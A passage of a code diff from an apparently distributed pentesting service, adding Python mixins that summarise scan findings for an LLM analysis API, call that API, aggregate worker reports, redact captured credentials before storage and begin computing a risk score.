"exposed_services": exposed, + "critical_or_high_findings": ( + findings_summary.get("by_severity", {}).get("CRITICAL", 0) + + findings_summary.get("by_severity", {}).get("HIGH", 0) + ), + } + + def _build_webapp_route_summary(self, aggregated_report: dict, job_config: dict, analysis_type: str) -> dict: + limits = self._get_llm_payload_limits(analysis_type) + routes = [] + forms = [] + seen_routes = set() + seen_forms = set() + + for route in job_config.get("app_routes", []) or []: + if not route or route in seen_routes: + continue + seen_routes.add(route) + routes.append(route) + + service_info = aggregated_report.get("service_info") + if isinstance(service_info, dict): + for port_entry in service_info.values(): + if not isinstance(port_entry, dict): + continue + for method_name, method_entry in port_entry.items(): + if not isinstance(method_entry, dict): + continue + if not str(method_name).startswith("_graybox_discovery"): + continue + for route in method_entry.get("routes", []) or []: + if not route or route in seen_routes: + continue + seen_routes.add(route) + routes.append(route) + for form in method_entry.get("forms", []) or []: + if not isinstance(form, dict): + continue + form_key = (form.get("action"), str(form.get("method") or "GET").upper()) + if form_key in seen_forms: + continue + seen_forms.add(form_key) + forms.append({ + "action": form.get("action"), + "method": str(form.get("method") or "GET").upper(), + }) + + route_limit = limits["services"] + form_limit = max(6, min(12, limits["services"])) + return { + "routes_sample": routes[:route_limit], + "forms_sample": forms[:form_limit], + "total_routes": len(routes), + "total_forms": len(forms), + "route_limit": route_limit, + "form_limit": form_limit, + } + + def _build_webapp_probe_summary(self, aggregated_report: dict, analysis_type: str) -> dict: + limits = self._get_llm_payload_limits(analysis_type) + probe_counts = {} + graybox_results = aggregated_report.get("graybox_results") + if isinstance(graybox_results, dict): + for probe_map in graybox_results.values(): + if not isinstance(probe_map, dict): + continue + for probe_name, probe_entry in probe_map.items(): + if not isinstance(probe_entry, dict): + continue + count = len([finding for finding in probe_entry.get("findings", []) if isinstance(finding, dict)]) + probe_counts[probe_name] = probe_counts.get(probe_name, 0) + count + + web_tests_info = aggregated_report.get("web_tests_info") + if isinstance(web_tests_info, dict): + for test_map in web_tests_info.values(): + if not isinstance(test_map, dict): + continue + for test_name, test_entry in test_map.items(): + if not isinstance(test_entry, dict): + continue + count = len([finding for finding in test_entry.get("findings", []) if isinstance(finding, dict)]) + probe_counts[test_name] = probe_counts.get(test_name, 0) + count + + ranked = sorted(probe_counts.items(), key=lambda item: (-item[1], item[0])) + return { + "top_probes": [ + {"probe": probe_name, "finding_count": count} + for probe_name, count in ranked[:limits["services"]] + ], + "total_probes": len(probe_counts), + } + + def _build_webapp_findings_summary(self, aggregated_report: dict) -> dict: + findings = self._deduplicate_findings(self._extract_report_findings(aggregated_report)) + severity_counts = {} + status_counts = {} + owasp_counts = {} + vulnerable_titles = [] + seen_titles = set() + + for finding in findings: + severity = str(finding.get("severity") or "UNKNOWN").upper() + status = str(finding.get("status") or "unknown").lower() + owasp = str(finding.get("owasp_id") or finding.get("owasp") or "").strip() + title = str(finding.get("title") or "").strip() + severity_counts[severity] = severity_counts.get(severity, 0) + 1 + status_counts[status] = status_counts.get(status, 0) + 1 + if owasp: + owasp_counts[owasp] = owasp_counts.get(owasp, 0) + 1 + if status == "vulnerable" and title and title not in seen_titles: + seen_titles.add(title) + vulnerable_titles.append(title) + + top_owasp = sorted(owasp_counts.items(), key=lambda item: (-item[1], item[0])) + return { + "total_findings": len(findings), + "by_severity": severity_counts, + "by_status": status_counts, + "top_owasp_categories": [ + {"category": category, "count": count} + for category, count in top_owasp[:6] + ], + "top_vulnerable_titles": vulnerable_titles[:8], + } + + def _build_webapp_coverage_summary(self, aggregated_report: dict, job_config: dict, analysis_type: str) -> dict: + route_summary = self._build_webapp_route_summary(aggregated_report, job_config, analysis_type) + scan_metrics = aggregated_report.get("scan_metrics") or {} + scenario_stats = aggregated_report.get("scenario_stats") or scan_metrics.get("scenario_stats") or {} + return { + "routes": route_summary, + "scan_metrics": scan_metrics, + "scenario_stats": scenario_stats, + "completed_tests": list(aggregated_report.get("completed_tests") or []), + } + + def _build_webapp_attack_surface_summary(self, aggregated_report: dict, findings_summary: dict, analysis_type: str) -> dict: + route_summary = self._build_webapp_route_summary(aggregated_report, {}, analysis_type) + return { + "route_count": route_summary["total_routes"], + "form_count": route_summary["total_forms"], + "vulnerable_scenarios": findings_summary.get("by_status", {}).get("vulnerable", 0), + "inconclusive_scenarios": findings_summary.get("by_status", {}).get("inconclusive", 0), + "top_owasp_categories": findings_summary.get("top_owasp_categories", []), + } + + def _build_llm_analysis_payload(self, job_id: str, aggregated_report: dict, job_config: dict, analysis_type: str) -> dict: + scan_type = job_config.get("scan_type", "network") + target = job_config.get("target_url") if scan_type == "webapp" else job_config.get("target", "unknown") + if scan_type != "webapp": + services, service_meta = self._build_network_service_summary(aggregated_report, analysis_type) + top_findings, finding_meta = self._build_llm_top_findings(aggregated_report, analysis_type) + findings_summary = self._build_llm_findings_summary(aggregated_report) + return { + "metadata": self._build_llm_metadata(job_id, target, scan_type, job_config), + "stats": { + "nr_open_ports": aggregated_report.get("nr_open_ports"), + "ports_scanned": aggregated_report.get("ports_scanned"), + "scan_metrics": aggregated_report.get("scan_metrics"), + "analysis_type": analysis_type, + }, + "services": services, + "top_findings": top_findings, + "coverage": self._build_llm_coverage_summary(aggregated_report, analysis_type), + "attack_surface": self._build_attack_surface_summary(services, findings_summary), + "truncation": { + "service_limit": self._get_llm_payload_limits(analysis_type)["services"], + "finding_limit": self._get_llm_payload_limits(analysis_type)["findings"], + **service_meta, + **finding_meta, + }, + "findings_summary": findings_summary, + } + + top_findings, finding_meta = self._build_llm_top_findings(aggregated_report, analysis_type) + findings_summary = self._build_webapp_findings_summary(aggregated_report) + probe_summary = self._build_webapp_probe_summary(aggregated_report, analysis_type) + coverage = self._build_webapp_coverage_summary(aggregated_report, job_config, analysis_type) + return { + "metadata": self._build_llm_metadata(job_id, target, scan_type, job_config), + "stats": { + "analysis_type": analysis_type, + "scan_metrics": aggregated_report.get("scan_metrics"), + "scenario_stats": aggregated_report.get("scenario_stats"), + }, + "top_findings": top_findings, + "findings_summary": findings_summary, + "probe_summary": probe_summary, + "coverage": coverage, + "attack_surface": self._build_webapp_attack_surface_summary(aggregated_report, findings_summary, analysis_type), + "truncation": { + "finding_limit": self._get_llm_payload_limits(analysis_type)["findings"], + **finding_meta, + "route_limit": coverage["routes"]["route_limit"], + "form_limit": coverage["routes"]["form_limit"], + "probe_limit": self._get_llm_payload_limits(analysis_type)["services"], + }, + } + + def _maybe_resolve_llm_agent_from_semaphore(self): + """ + If SEMAPHORED_KEYS is configured and LLM Agent is enabled, + read API_IP and API_PORT from semaphore env published by + the LLM Agent API plugin. Overrides static config values. + """ + llm_cfg = self._get_llm_agent_config() + if not llm_cfg["ENABLED"]: + return False + semaphored_keys = getattr(self, 'cfg_semaphored_keys', None) + if not semaphored_keys: + return False + if not self.semaphore_is_ready(): + return False + env = self.semaphore_get_env() + if not env: + return False + api_host = env.get('API_IP') or env.get('API_HOST') or env.get('HOST') + api_port = env.get('PORT') or env.get('API_PORT') + if api_host and api_port: + self.P("Resolved LLM Agent API from semaphore: {}:{}".format(api_host, api_port)) + self.config_data['LLM_AGENT_API_HOST'] = api_host + self.config_data['LLM_AGENT_API_PORT'] = int(api_port) + return True + return False + + def _get_llm_agent_api_url(self, endpoint: str) -> str: + """ + Build URL for LLM Agent API endpoint. + + Parameters + ---------- + endpoint : str + API endpoint path (e.g., "/chat", "/analyze_scan"). + + Returns + ------- + str + Full URL to the endpoint. + """ + host = self.cfg_llm_agent_api_host + port = self.cfg_llm_agent_api_port + endpoint = endpoint.lstrip("/") + return f"http://{host}:{port}/{endpoint}" + + def _extract_provider_http_status(self, error_details) -> int | None: + """Best-effort extraction of an upstream provider HTTP status from error details.""" + if isinstance(error_details, dict): + for key in ("status_code", "http_status", "provider_status"): + value = error_details.get(key) + if isinstance(value, int): + return value + detail = error_details.get("detail") or error_details.get("error") + if isinstance(detail, str): + return self._extract_provider_http_status(detail) + + if isinstance(error_details, str): + marker = "status " + if marker in error_details: + tail = error_details.split(marker, 1)[1] + digits = "".join(ch for ch in tail if ch.isdigit()) + if digits: + try: + return int(digits) + except ValueError: + return None + return None + + def _is_non_retryable_llm_error(self, result: dict | None) -> bool: + """Return True when an LLM/API error is permanent and retrying is wasteful.""" + if not isinstance(result, dict) or "error" not in result: + return False + + http_status = result.get("http_status") + if isinstance(http_status, int) and http_status in _NON_RETRYABLE_HTTP_STATUSES: + return True + + provider_status = result.get("provider_status") + if isinstance(provider_status, int) and provider_status in _NON_RETRYABLE_PROVIDER_STATUSES: + return True + + return result.get("status") in {"api_request_error", "provider_request_error"} + + def _call_llm_agent_api( + self, + endpoint: str, + method: str = "POST", + payload: dict = None, + timeout: int = None + ) -> dict: + """ + Make HTTP request to the LLM Agent API. + + Parameters + ---------- + endpoint : str + API endpoint to call (e.g., "/analyze_scan", "/health"). + method : str, optional + HTTP method (default: "POST"). + payload : dict, optional + JSON payload for POST requests. + timeout : int, optional + Request timeout in seconds. + + Returns + ------- + dict + API response or error object. + """ + llm_cfg = self._get_llm_agent_config() + if not llm_cfg["ENABLED"]: + return {"error": "LLM Agent API is not enabled", "status": "disabled"} + + if not self.cfg_llm_agent_api_port: + return {"error": "LLM Agent API port not configured", "status": "config_error"} + + url = self._get_llm_agent_api_url(endpoint) + timeout = timeout or llm_cfg["TIMEOUT"] + retries = max(int(getattr(self, "cfg_llm_api_retries", 1) or 1), 1) + + def _attempt(): + self.Pd(f"Calling LLM Agent API: {method} {url}") + + if method.upper() == "GET": + response = requests.get(url, timeout=timeout) + else: + response = requests.post( + url, + json=payload or {}, + headers={"Content-Type": "application/json"}, + timeout=timeout + ) + + if response.status_code != 200: + details = response.text + try: + details = response.json() + except Exception: + pass + + result = { + "error": f"LLM Agent API returned status {response.status_code}", + "status": "api_error", + "details": details, + "http_status": response.status_code, + } + if response.status_code in _NON_RETRYABLE_HTTP_STATUSES: + result["status"] = "api_request_error" + + provider_status = self._extract_provider_http_status(details) + if provider_status is not None: + result["provider_status"] = provider_status + if provider_status in _NON_RETRYABLE_PROVIDER_STATUSES: + result["status"] = "provider_request_error" + + return { + **result, + "retryable": not self._is_non_retryable_llm_error(result), + } + + # Unwrap response if FastAPI wrapped it (extract 'result' from envelope) + response_data = response.json() + if isinstance(response_data, dict) and "result" in response_data: + return response_data["result"] + return response_data + + def _is_success(response_data): + if not isinstance(response_data, dict): + return False + if "error" not in response_data: + return True + return self._is_non_retryable_llm_error(response_data) + + try: + result = run_bounded_retry(self, "llm_agent_api", retries, _attempt, is_success=_is_success) + except requests.exceptions.ConnectionError: + self.P(f"LLM Agent API not reachable at {url}", color='y') + return {"error": "LLM Agent API not reachable", "status": "connection_error"} + except requests.exceptions.Timeout: + self.P("LLM Agent API request timed out", color='y') + return {"error": "LLM Agent API request timed out", "status": "timeout"} + except Exception as e: + self.P(f"Error calling LLM Agent API: {e}", color='r') + return {"error": str(e), "status": "error"} + + if isinstance(result, dict) and "error" in result: + status = result.get("status") + if status == "connection_error": + self.P(f"LLM Agent API not reachable at {url}", color='y') + elif status == "timeout": + self.P("LLM Agent API request timed out", color='y') + elif self._is_non_retryable_llm_error(result): + provider_status = result.get("provider_status") + detail = result.get("details") + suffix = f" (provider_status={provider_status})" if provider_status else "" + self.P(f"LLM Agent API request rejected{suffix}: {result.get('error')}", color='y') + if detail: + self.Pd(f"LLM Agent API rejection details: {detail}") + else: + self.P(f"LLM Agent API call failed: {result.get('error')}", color='y') + return result + return result + + def _auto_analyze_report( + self, job_id: str, report: dict, target: str, scan_type: str = "network", analysis_type: str = None, + ) -> Optional[dict]: + """ + Automatically analyze a completed scan report using LLM Agent API. + + Parameters + ---------- + job_id : str + Identifier of the completed job. + report : dict + Aggregated scan report to analyze. + target : str + Target hostname/IP that was scanned. + scan_type : str, optional + "network" or "webapp" — selects the prompt set. + + Returns + ------- + dict or None + LLM analysis result or None if disabled/failed. + """ + llm_cfg = self._get_llm_agent_config() + if not llm_cfg["ENABLED"]: + self.Pd("LLM auto-analysis skipped (not enabled)") + return None + + self.P(f"Running LLM auto-analysis for job {job_id}, target {target} (scan_type={scan_type})...") + + analysis_result = self._call_llm_agent_api( + endpoint="/analyze_scan", + method="POST", + payload={ + "scan_results": report, + "analysis_type": analysis_type or llm_cfg["AUTO_ANALYSIS_TYPE"], + "scan_type": scan_type, + "focus_areas": None, + } + ) + + if "error" in analysis_result: + self.P(f"LLM auto-analysis failed for job {job_id}: {analysis_result.get('error')}", color='y') + else: + self.P(f"LLM auto-analysis completed for job {job_id}") + + return analysis_result + + def _collect_node_reports(self, workers: dict) -> dict: + """ + Collect individual node reports from all workers. + + Parameters + ---------- + workers : dict + Worker entries from job_specs containing report_cid or result. + + Returns + ------- + dict + Mapping {addr: report_dict} for each worker with data. + """ + all_reports = {} + + for addr, worker_entry in workers.items(): + report = None + report_cid = worker_entry.get("report_cid") + + # Try to fetch from R1FS first + if report_cid: + try: + report = self.r1fs.get_json(report_cid) + self.Pd(f"Fetched report from R1FS for worker {addr}: CID {report_cid}") + except Exception as e: + self.P(f"Failed to fetch report from R1FS for {addr}: {e}", color='y') + + # Fallback to direct result + if not report: + report = worker_entry.get("result") + + if report: + all_reports[addr] = report + + if not all_reports: + self.P("No reports found to collect", color='y') + + return all_reports + + def _run_aggregated_llm_analysis( + self, + job_id: str, + aggregated_report: dict, + job_config: dict, + ) -> str | None: + """ + Run LLM analysis on a pre-aggregated report. + + The caller aggregates once and passes the result. This method + no longer fetches node reports or saves to R1FS. + + Parameters + ---------- + job_id : str + Identifier of the job. + aggregated_report : dict + Pre-aggregated scan data from all workers. + job_config : dict + Job configuration (from R1FS). + + Returns + ------- + str or None + LLM analysis markdown text if successful, None otherwise. + """ + scan_type = job_config.get("scan_type", "network") + target = job_config.get("target_url") if scan_type == "webapp" else job_config.get("target", "unknown") + self.P(f"Running aggregated LLM analysis for job {job_id}, target {target}...") + + if not aggregated_report: + self.P(f"No data to analyze for job {job_id}", color='y') + return None + + report_with_meta = self._build_llm_analysis_payload( + job_id, + aggregated_report, + job_config, + self._get_llm_agent_config()["AUTO_ANALYSIS_TYPE"], + ) + self._record_llm_payload_stats( + job_id, + self._get_llm_agent_config()["AUTO_ANALYSIS_TYPE"], + aggregated_report, + report_with_meta, + ) + + # Call LLM analysis + llm_analysis = self._auto_analyze_report(job_id, report_with_meta, target, scan_type=scan_type) + self._last_llm_analysis_status = llm_analysis.get("status") if isinstance(llm_analysis, dict) else None + + if not llm_analysis or "error" in llm_analysis: + self.P( + f"LLM analysis failed for job {job_id}: {llm_analysis.get('error') if llm_analysis else 'No response'}", + color='y' + ) + return None + + # Extract the markdown text from the analysis result + if isinstance(llm_analysis, dict): + return llm_analysis.get("content", llm_analysis.get("analysis", llm_analysis.get("markdown", str(llm_analysis)))) + return str(llm_analysis) + + def _run_quick_summary_analysis( + self, + job_id: str, + aggregated_report: dict, + job_config: dict, + ) -> str | None: + """ + Run a short (2-4 sentence) AI quick summary on a pre-aggregated report. + + The caller aggregates once and passes the result. This method + no longer fetches node reports or saves to R1FS. + + Parameters + ---------- + job_id : str + Identifier of the job. + aggregated_report : dict + Pre-aggregated scan data from all workers. + job_config : dict + Job configuration (from R1FS). + + Returns + ------- + str or None + Quick summary text if successful, None otherwise. + """ + scan_type = job_config.get("scan_type", "network") + target = job_config.get("target_url") if scan_type == "webapp" else job_config.get("target", "unknown") + self.P(f"Running quick summary analysis for job {job_id}, target {target}...") + + if not aggregated_report: + self.P(f"No data for quick summary for job {job_id}", color='y') + return None + + report_with_meta = self._build_llm_analysis_payload( + job_id, + aggregated_report, + job_config, + "quick_summary", + ) + self._record_llm_payload_stats(job_id, "quick_summary", aggregated_report, report_with_meta) + + # Call LLM analysis with quick_summary type + analysis_result = self._call_llm_agent_api( + endpoint="/analyze_scan", + method="POST", + payload={ + "scan_results": report_with_meta, + "analysis_type": "quick_summary", + "scan_type": scan_type, + "focus_areas": None, + } + ) + self._last_llm_summary_status = analysis_result.get("status") if isinstance(analysis_result, dict) else None + + if not analysis_result or "error" in analysis_result: + self.P( + f"Quick summary failed for job {job_id}: {analysis_result.get('error') if analysis_result else 'No response'}", + color='y' + ) + return None + + # Extract the summary text from the result + if isinstance(analysis_result, dict): + return analysis_result.get("content", analysis_result.get("summary", analysis_result.get("analysis", str(analysis_result)))) + return str(analysis_result) + + def _get_llm_health_status(self) -> dict: + """ + Check health of the LLM Agent API connection. + + Returns + ------- + dict + Health status of the LLM Agent API. + """ + llm_cfg = self._get_llm_agent_config() + if not llm_cfg["ENABLED"]: + return { + "enabled": False, + "status": "disabled", + "message": "LLM Agent API integration is disabled", + } + + if not self.cfg_llm_agent_api_port: + return { + "enabled": True, + "status": "config_error", + "message": "LLM Agent API port not configured", + } + + result = self._call_llm_agent_api(endpoint="/health", method="GET", timeout=5) + + if "error" in result: + return { + "enabled": True, + "status": result.get("status", "error"), + "message": result.get("error"), + "host": self.cfg_llm_agent_api_host, + "port": self.cfg_llm_agent_api_port, + } + + return { + "enabled": True, + "status": "ok", + "host": self.cfg_llm_agent_api_host, + "port": self.cfg_llm_agent_api_port, + "llm_agent_health": result, + } diff --git a/extensions/business/cybersec/red_mesh/mixins/report.py b/extensions/business/cybersec/red_mesh/mixins/report.py new file mode 100644 index 00000000..db60db6d --- /dev/null +++ b/extensions/business/cybersec/red_mesh/mixins/report.py @@ -0,0 +1,426 @@ +""" +Report aggregation mixin for RedMesh pentester API. + +Handles merging worker results, credential redaction, and pre-computing +the UI aggregate view for the frontend. +""" + +from ..worker import PentestLocalWorker +from ..models import UiAggregate + + +class _ReportMixin: + """Report aggregation and UI view methods for PentesterApi01Plugin.""" + + SEVERITY_ORDER = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3, "INFO": 4} + CONFIDENCE_ORDER = {"certain": 0, "firm": 1, "tentative": 2} + + @staticmethod + def _count_nested_findings(section): + """Count findings in a nested {port: {probe: {findings: []}}} section.""" + total = 0 + for per_port in (section or {}).values(): + if not isinstance(per_port, dict): + continue + for per_probe in per_port.values(): + if isinstance(per_probe, dict): + total += len(per_probe.get("findings", [])) + return total + + def _count_all_findings(self, report): + """Count all findings emitted by network and graybox reporting sections.""" + if not isinstance(report, dict): + return 0 + return ( + self._count_nested_findings(report.get("service_info")) + + self._count_nested_findings(report.get("web_tests_info")) + + len(report.get("correlation_findings") or []) + + self._count_nested_findings(report.get("graybox_results")) + ) + + @staticmethod + def _dedupe_items(items): + """Deduplicate mixed scalar/dict items while preserving first-seen order.""" + import json as _json + + deduped = [] + seen = set() + for item in items: + try: + key = _json.dumps(item, sort_keys=True, default=str) + except (TypeError, ValueError): + key = str(item) + if key in seen: + continue + seen.add(key) + deduped.append(item) + return deduped + + def _extract_graybox_ui_stats(self, aggregated, latest_pass=None): + """Extract graybox-specific archive summary values from aggregated data.""" + latest_pass = latest_pass or {} + scan_metrics = latest_pass.get("scan_metrics") or {} + + service_info = aggregated.get("service_info") or {} + graybox_results = aggregated.get("graybox_results") or {} + + routes = [] + forms = [] + for methods in service_info.values(): + if not isinstance(methods, dict): + continue + discovery = methods.get("_graybox_discovery") + if not isinstance(discovery, dict): + continue + routes.extend(discovery.get("routes") or []) + forms.extend(discovery.get("forms") or []) + + scenario_total = 0 + scenario_vulnerable = 0 + for probes in graybox_results.values(): + if not isinstance(probes, dict): + continue + for probe_data in probes.values(): + if not isinstance(probe_data, dict): + continue + for finding in probe_data.get("findings", []): + if not isinstance(finding, dict): + continue + status = finding.get("status") + if not status: + continue + scenario_total += 1 + if status == "vulnerable": + scenario_vulnerable += 1 + + if scan_metrics: + scenario_total = max(scenario_total, scan_metrics.get("scenarios_total", 0) or 0) + scenario_vulnerable = max( + scenario_vulnerable, + scan_metrics.get("scenarios_vulnerable", 0) or 0, + ) + + return { + "total_routes_discovered": len(self._dedupe_items(routes)), + "total_forms_discovered": len(self._dedupe_items(forms)), + "total_scenarios": scenario_total, + "total_scenarios_vulnerable": scenario_vulnerable, + } + + def _get_aggregated_report(self, local_jobs, worker_cls=None): + """ + Aggregate results from multiple local workers. + + Parameters + ---------- + local_jobs : dict + Mapping of worker id to result dicts. + worker_cls : type, optional + Worker class to resolve aggregation fields from. Defaults to + PentestLocalWorker for backward compat. + + Returns + ------- + dict + Aggregated report with merged open ports, service info, etc. + """ + dct_aggregated_report = {} + type_or_func, field = None, None + try: + if local_jobs: + self.P(f"Aggregating reports from {len(local_jobs)} local jobs...") + for local_worker_id, local_job_status in local_jobs.items(): + if worker_cls and hasattr(worker_cls, 'get_worker_specific_result_fields'): + aggregation_fields = worker_cls.get_worker_specific_result_fields() + else: + aggregation_fields = PentestLocalWorker.get_worker_specific_result_fields() + for field in local_job_status: + if field not in dct_aggregated_report: + dct_aggregated_report[field] = local_job_status[field] + elif field in aggregation_fields: + type_or_func = aggregation_fields[field] + if field not in dct_aggregated_report: + field_type = type(local_job_status[field]) + dct_aggregated_report[field] = field_type() + #endif + if isinstance(dct_aggregated_report[field], list): + existing = set(dct_aggregated_report[field]) + merged = existing.union(local_job_status[field]) + try: + dct_aggregated_report[field] = sorted(merged) + except TypeError: + dct_aggregated_report[field] = list(merged) + elif isinstance(dct_aggregated_report[field], dict): + dct_aggregated_report[field] = self.merge_objects_deep( + dct_aggregated_report[field], + local_job_status[field]) + else: + _existing = dct_aggregated_report[field] + _new = local_job_status[field] + dct_aggregated_report[field] = type_or_func([_existing, _new]) + # end if aggregation type + # end if standard (one time) or aggregated fields + # for each field in this local job + # for each local job + self.P(f"Report aggregation done.") + # endif we have local jobs + except Exception as exc: + self.P("Error during report aggregation: {}:\n{}\n{}\ntype_or_func={}, field={}".format( + exc, self.trace_info(), + self.json_dumps(dct_aggregated_report, indent=2), + type_or_func, field + )) + return dct_aggregated_report + + def merge_objects_deep(self, obj_a, obj_b): + """ + Deeply merge two objects (dicts, lists, sets). + + Parameters + ---------- + obj_a : Any + First object. + obj_b : Any + Second object. + + Returns + ------- + Any + Merged object. + """ + if isinstance(obj_a, dict) and isinstance(obj_b, dict): + merged = dict(obj_a) + for key, value_b in obj_b.items(): + if key in merged: + merged[key] = self.merge_objects_deep(merged[key], value_b) + else: + merged[key] = value_b + return merged + elif isinstance(obj_a, list) and isinstance(obj_b, list): + try: + return list(set(obj_a).union(set(obj_b))) + except TypeError: + import json as _json + seen = set() + merged = [] + for item in obj_a + obj_b: + try: + key = _json.dumps(item, sort_keys=True, default=str) + except (TypeError, ValueError): + key = id(item) + if key not in seen: + seen.add(key) + merged.append(item) + return merged + elif isinstance(obj_a, set) and isinstance(obj_b, set): + return obj_a.union(obj_b) + else: + return obj_b # Prefer obj_b in case of conflict + + def _redact_report(self, report): + """ + Redact credentials from a report before persistence. + + Deep-copies the report and masks password values in findings and + accepted_credentials lists so that sensitive data is not written + to R1FS or CStore. + + Parameters + ---------- + report : dict + Aggregated scan report. + + Returns + ------- + dict + Redacted copy of the report. + """ + import re as _re + from copy import deepcopy + redacted = deepcopy(report) + service_info = redacted.get("service_info", {}) + for port_key, methods in service_info.items(): + if not isinstance(methods, dict): + continue + for method_key, method_data in methods.items(): + if not isinstance(method_data, dict): + continue + # Redact findings evidence + for finding in method_data.get("findings", []): + if not isinstance(finding, dict): + continue + evidence = finding.get("evidence", "") + if isinstance(evidence, str): + evidence = _re.sub( + r'(Accepted credential:\s*\S+?):(\S+)', + r'\1:***', evidence + ) + evidence = _re.sub( + r'(Accepted random creds\s*\S+?):(\S+)', + r'\1:***', evidence + ) + finding["evidence"] = evidence + # Redact accepted_credentials lists + creds = method_data.get("accepted_credentials", []) + if isinstance(creds, list): + method_data["accepted_credentials"] = [ + _re.sub(r'^(\S+?):(.+)$', r'\1:***', c) if isinstance(c, str) else c + for c in creds + ] + # Redact graybox_results credential evidence + _CRED_RE = _re.compile(r'(\S+?):(\S+)') + _PASSWORD_RE = _re.compile(r'((?:password|passwd|pwd)["\']?\s*[:=]\s*)(["\']?)[^\s"\'&]+', _re.I) + + def _redact_graybox_text(value): + if not isinstance(value, str): + return value + value = _CRED_RE.sub(r'\1:***', value) + value = _PASSWORD_RE.sub(r'\1\2***', value) + return value + + graybox_results = redacted.get("graybox_results", {}) + for port_key, probes in graybox_results.items(): + if not isinstance(probes, dict): + continue + for probe_name, probe_data in probes.items(): + if not isinstance(probe_data, dict): + continue + for finding in probe_data.get("findings", []): + if not isinstance(finding, dict): + continue + evidence = finding.get("evidence", []) + if isinstance(evidence, list): + finding["evidence"] = [ + _redact_graybox_text(e) + for e in evidence + ] + artifacts = finding.get("evidence_artifacts", []) + if isinstance(artifacts, list): + finding["evidence_artifacts"] = [ + { + **artifact, + "summary": _redact_graybox_text(artifact.get("summary", "")), + "request_snapshot": _redact_graybox_text(artifact.get("request_snapshot", "")), + "response_snapshot": _redact_graybox_text(artifact.get("response_snapshot", "")), + } + if isinstance(artifact, dict) else artifact + for artifact in artifacts + ] + artifacts = probe_data.get("artifacts", []) + if isinstance(artifacts, list): + probe_data["artifacts"] = [ + { + **artifact, + "summary": _redact_graybox_text(artifact.get("summary", "")), + "request_snapshot": _redact_graybox_text(artifact.get("request_snapshot", "")), + "response_snapshot": _redact_graybox_text(artifact.get("response_snapshot", "")), + } + if isinstance(artifact, dict) else artifact + for artifact in artifacts + ] + return redacted + + @staticmethod + def _redact_job_config(config_dict): + """ + Redact credential fields from a job config dict before persistence. + + Parameters + ---------- + config_dict : dict + JobConfig.to_dict() output. + + Returns + ------- + dict + Copy with official_password, regular_password, and weak_candidates masked. + """ + redacted = dict(config_dict) + if redacted.get("official_password"): + redacted["official_password"] = "***" + if redacted.get("regular_password"): + redacted["regular_password"] = "***" + if redacted.get("weak_candidates"): + redacted["weak_candidates"] = ["***"] * len(redacted["weak_candidates"]) + redacted.pop("secret_ref", None) + return redacted + + def _compute_ui_aggregate(self, passes, latest_aggregated, job_config=None): + """Compute pre-aggregated view for frontend from pass reports. + + Parameters + ---------- + passes : list + List of pass report dicts (PassReport.to_dict()). + latest_aggregated : dict + AggregatedScanData dict for the latest pass. + + Returns + ------- + UiAggregate + """ + from collections import Counter + + latest = passes[-1] + agg = latest_aggregated + findings = latest.get("findings", []) or [] + scan_type = (job_config or {}).get("scan_type", "network") + graybox_stats = { + "total_routes_discovered": 0, + "total_forms_discovered": 0, + "total_scenarios": 0, + "total_scenarios_vulnerable": 0, + } + if scan_type == "webapp": + graybox_stats = self._extract_graybox_ui_stats(agg, latest) + + # Severity breakdown + findings_count = dict(Counter(f.get("severity", "INFO") for f in findings)) + + # Top findings: CRITICAL + HIGH, sorted by severity then confidence, capped at 10 + crit_high = [f for f in findings if f.get("severity") in ("CRITICAL", "HIGH")] + crit_high.sort(key=lambda f: ( + self.SEVERITY_ORDER.get(f.get("severity"), 9), + self.CONFIDENCE_ORDER.get(f.get("confidence"), 9), + )) + top_findings = crit_high[:10] + + # Finding timeline: track persistence across passes (continuous monitoring) + finding_timeline = {} + for p in passes: + pass_nr = p.get("pass_nr", 0) + for f in (p.get("findings") or []): + fid = f.get("finding_id") + if not fid: + continue + if fid not in finding_timeline: + finding_timeline[fid] = {"first_seen": pass_nr, "last_seen": pass_nr, "pass_count": 1} + else: + finding_timeline[fid]["last_seen"] = pass_nr + finding_timeline[fid]["pass_count"] += 1 + + return UiAggregate( + total_open_ports=sorted(set(agg.get("open_ports", []))), + total_services=self._count_services(agg.get("service_info", {})), + total_findings=len(findings), + findings_count=findings_count if findings_count else None, + top_findings=top_findings if top_findings else None, + finding_timeline=finding_timeline if finding_timeline else None, + latest_risk_score=latest.get("risk_score"), + latest_risk_breakdown=latest.get("risk_breakdown"), + latest_quick_summary=latest.get("quick_summary"), + worker_activity=[ + { + "id": addr, + "start_port": w["start_port"], + "end_port": w["end_port"], + "open_ports": w.get("open_ports", []), + } + for addr, w in (latest.get("worker_reports") or {}).items() + ] or None, + scan_type=scan_type, + total_routes_discovered=graybox_stats["total_routes_discovered"], + total_forms_discovered=graybox_stats["total_forms_discovered"], + total_scenarios=graybox_stats["total_scenarios"], + total_scenarios_vulnerable=graybox_stats["total_scenarios_vulnerable"], + ) diff --git a/extensions/business/cybersec/red_mesh/mixins/risk.py b/extensions/business/cybersec/red_mesh/mixins/risk.py new file mode 100644 index 00000000..630b8262 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/mixins/risk.py @@ -0,0 +1,361 @@ +""" +Risk scoring mixin for RedMesh pentester API. + +Pure computation — takes aggregated scan reports and produces risk scores +(0-100) with breakdowns and flat findings lists. No CStore or R1FS access. +""" + +from ..constants import ( + RISK_SEVERITY_WEIGHTS, + RISK_CONFIDENCE_MULTIPLIERS, + RISK_SIGMOID_K, + RISK_CRED_PENALTY_PER, + RISK_CRED_PENALTY_CAP, +) + + +class _RiskScoringMixin: + """Risk scoring and findings extraction methods for PentesterApi01Plugin.""" + + def _compute_risk_score(self, aggregated_report): + """ + Compute a 0-100 risk score from an aggregated scan report. + + The score combines four components: + A. Finding severity (weighted by confidence) + B. Open ports (diminishing returns) + C. Attack surface breadth (distinct protocols) + D. Default credentials penalty + + Parameters + ---------- + aggregated_report : dict + Aggregated report with service_info, web_tests_info, correlation_findings, + open_ports, and port_protocols. + + Returns + ------- + dict + ``{"score": int, "breakdown": dict}`` + """ + import math + + findings_score = 0.0 + finding_counts = {"CRITICAL": 0, "HIGH": 0, "MEDIUM": 0, "LOW": 0, "INFO": 0} + cred_count = 0 + + def process_findings(findings_list): + nonlocal findings_score, cred_count + for finding in findings_list: + if not isinstance(finding, dict): + continue + severity = finding.get("severity", "INFO").upper() + confidence = finding.get("confidence", "firm").lower() + weight = RISK_SEVERITY_WEIGHTS.get(severity, 0) + multiplier = RISK_CONFIDENCE_MULTIPLIERS.get(confidence, 0.5) + findings_score += weight * multiplier + if severity in finding_counts: + 